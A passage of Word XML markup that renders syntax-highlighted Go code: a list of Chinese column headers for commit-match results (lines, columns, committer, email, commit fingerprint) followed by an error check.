          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>匹配内容</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开始行</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>结束行</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开始列</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>结束列</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交者</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交信息</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交时间</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"Commit</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指纹</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">err != </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">nil </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>err</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
